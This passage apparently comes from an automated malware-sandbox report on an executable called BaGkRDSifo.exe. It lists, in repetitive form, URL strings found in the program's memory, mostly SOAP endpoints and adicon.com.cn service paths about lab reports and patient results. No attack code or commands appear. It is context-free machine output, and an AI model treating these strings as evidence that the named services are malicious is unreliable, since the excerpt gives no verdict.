Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadBarCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportByBarCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportByBarcodeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportByPersonIDAndClientNoAndSickTypeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportByPersonIDT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportByReportFormIDT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportFormIDListByBarcodeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadReportT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/GetReportFormColumnT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/GetReportUriT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/HelloWorldT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/QueryReport_PKIT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/QueryReportsCountT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/RefuseDownloadBarCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/T
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/UpLoadReportFromBytesNewT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/UpLoadReportFromBytesT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/UpLoadReportFromBytes_ImageListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/UpLoadReportFromStrT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/UpLoadRequestFormClientT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/UpgradeRequestFormT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/addInspectReqNoXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/addInspectReqT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/getPatResultNoXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/getPatResultT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/retrieveDocumentViewInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/rm_RegionTransT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/rm_Region_FeedbackT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppBarcodeStateT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppInfoDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppItemDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppTrackDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppUpLoadDeleteT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppUpLoadXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/AppUpdateInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/DeleteGPGFileT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/DetailListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ExistsByYYtmT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ExistsReportByYYtmT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ExistsReportOtherT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ExistsReportT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetAMHItemListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetAllSampleListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetAllSampleList_MeiNianT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicByKeyIdT
